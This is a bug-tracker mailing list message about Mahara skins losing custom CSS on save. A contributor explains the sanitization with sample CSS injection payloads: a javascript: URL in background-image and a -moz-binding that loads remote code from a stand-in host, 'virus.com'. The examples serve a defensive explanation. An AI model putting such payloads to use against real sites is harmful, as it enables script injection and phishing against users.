mahara-contributors team mailing list archive

Thread
Date

[Bug 1264098] Re: skins not saving properly

To: mahara-contributors@xxxxxxxxxxxxxxxxxxx
From: Son Nguyen <1264098@xxxxxxxxxxxxxxxxxx>
Date: Sun, 05 Jan 2014 23:32:31 -0000
Reply-to: Bug 1264098 <1264098@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

Some css properties and their values need to be sanitized to prevent injections or phishing
For example,

background-image: url(javascript:alert('Injected'));
-moz-binding: url('http://virus.com/htmlBindings.xml');
position: absolute;

See more at
https://code.google.com/p/browsersec/wiki/Part1#Cascading_stylesheets

-- 
You received this bug notification because you are a member of Mahara
Contributors, which is subscribed to Mahara.
Matching subscriptions: Subscription for all Mahara Contributors -- please ask on #mahara-dev or mahara.org forum before editing or unsubscribing it!
https://bugs.launchpad.net/bugs/1264098

Title:
  skins not saving properly

Status in Mahara ePortfolio:
  Confirmed

Bug description:
  I tried to create a new skin with custom CSS code added to the
  "Advanced" tab.

  collection-nav ul {
    columns: 2;
    -webkit-columns: 2;
    -moz-columns: 2;
  }

  When I save it, and then try to edit the skin, everything is deleted
  except:

  ul {
  }

To manage notifications about this bug go to:
https://bugs.launchpad.net/mahara/+bug/1264098/+subscriptions

References

[Bug 1264098] [NEW] skins not saving properly
From: Melissa Newman, 2013-12-25